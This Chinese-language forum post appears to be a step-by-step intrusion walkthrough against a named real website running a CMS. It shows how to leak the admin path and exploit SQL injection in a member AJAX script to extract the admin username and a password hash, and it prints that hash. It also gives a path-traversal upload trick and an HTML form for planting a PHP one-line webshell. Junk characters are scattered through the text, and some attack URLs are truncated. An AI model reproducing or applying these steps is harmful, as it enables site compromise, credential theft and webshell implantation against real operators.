①注入漏洞。
* i5 y) H$ L& ~8 v, r" F6 t这站 http://www.political-security.com/
3 D9 c2 f/ _) \! q8 E首先访问“/data/admin/ver.txt”页面获取系统最后升级时间,8 v: \6 ?7 J% H$ C0 [
www.political-security.com/data/mysql_error_trace.inc 爆后台
! u3 ?, A- q, n/ [然后访问“/member/ajax_membergroup.php?action=post&membergroup=1”页面,如图说明存在该漏洞。& v; l" o" q3 |0 H2 O* C
然后写上语句 7 _; {% X3 K2 A/ n: f
查看管理员帐号3 J0 o6 X8 y5 d& w W5 L
http://www.political-security.co ... &membergroup=@`( _% i* N' o& e$ D6 _3 j
8 Y4 _- E8 u4 c: _, s9 \0 n. t: H
admin
, @; B! Q4 j( U E! Y/ p7 {& \+ z
( g) C2 M( L* o* w, j W" x查看管理员密码. J+ G* q: D- ^
http://www.political-security.co ... &membergroup=@`% a% r: _ |; Y
! F! q1 D5 Y! \& v- Q
8d29b1ef9f8c5a5af429
% Q4 P2 p, W) ]% u4 L/ Y, m4 j# I3 |! }- y* r
查看管理员密码5 K8 ? ^4 b3 q: G& D+ Y7 K/ o
' ^4 y& ?+ s& A+ T. u; [% g得到的是19位的,去掉前三位和最后一位,得到管理员的16位MD5
* p* v1 h# }$ \
1 R* d, [$ }. w3 F+ o; K8d27 j* S/ n- I- j5 F; j8 E
9b1ef9f8c5a5af42. b3 d5 C: v8 H }% i
9
( @$ W; k& |" v
9 w1 v7 f0 j4 L9 `/ d: `' H& fcmd5没解出来 只好测试第二个方法5 [" Z) N% A J- V/ E
6 q/ ? J' t5 D% Q2 N
6 I0 l% l5 N8 \8 y②上传漏洞:1 m" H8 K& n0 z9 a
% ^8 p% q: R: f$ t h
只要登陆会员中心,然后访问页面链接2 w8 z2 `2 m/ v- r7 p4 p) s) Q
“/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post”1 G# i& v( J, R2 l" z& v
4 o- N" u% D* u/ C5 T如图,说明通过“/plus/carbuyaction.php”已经成功调用了上传页面“/dialog/select_soft_post”
8 i6 t( ]$ y. k! R" ^
- z' U0 u& F4 d3 O于是将Php一句话木马扩展名改为“rar”等,利用提交页面upload1.htm2 T2 c5 N2 s4 T2 ?1 T) X* b& x
2 ~) L- N' `" K
<form action="http://www.political-security.com/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post" method="post" enctype="multipart/form-data" name="form1"> file:<input name="uploadfile" type="file" /><br> newname:<input name="newname" type="text" value="myfile.Php"/> <button class="button2" type="submit">提交</button><br><br>& q, L# Q- I1 ]8 R4 B1 O' P
或者
5 s( k/ Z$ J- R即可上传成功 |